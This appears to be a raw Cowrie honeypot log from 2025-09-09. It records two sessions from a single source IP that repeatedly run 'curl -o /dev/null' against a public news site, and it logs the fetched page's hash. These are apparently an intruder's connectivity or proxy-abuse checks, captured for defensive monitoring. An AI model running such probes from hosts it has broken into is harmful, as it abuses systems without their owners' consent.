{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.224317Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.227045Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.234596Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.239273Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.240337Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.254953Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.256215Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.263595Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.265309Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.269927Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.271616Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.276810Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.279871Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.280887Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.282753Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.288512Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.293680Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.294477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.301854Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.309432Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.317213Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.319848Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.320656Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.328061Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.332522Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.333405Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.356710Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.357800Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.362820Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.374110Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.375154Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.379134Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.392712Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.394430Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.395376Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.402152Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.403675Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.413045Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.413993Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.437584Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.438734Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.443510Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.451401Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.452353Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.458193Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.473725Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.474810Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.479489Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.482639Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.490887Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.491779Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.495608Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.511545Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.512565Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.517416Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.520194Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.528560Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.529612Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.547022Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.548044Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.549348Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.560498Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.577222Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.578177Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.591079Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.592660Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.593429Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.617731Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.618930Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.621666Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.627301Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.628121Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.650995Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.655684Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.656720Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.661581Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.662516Z","src_ip":"212.227.125.160","session":"7541ed730449"}
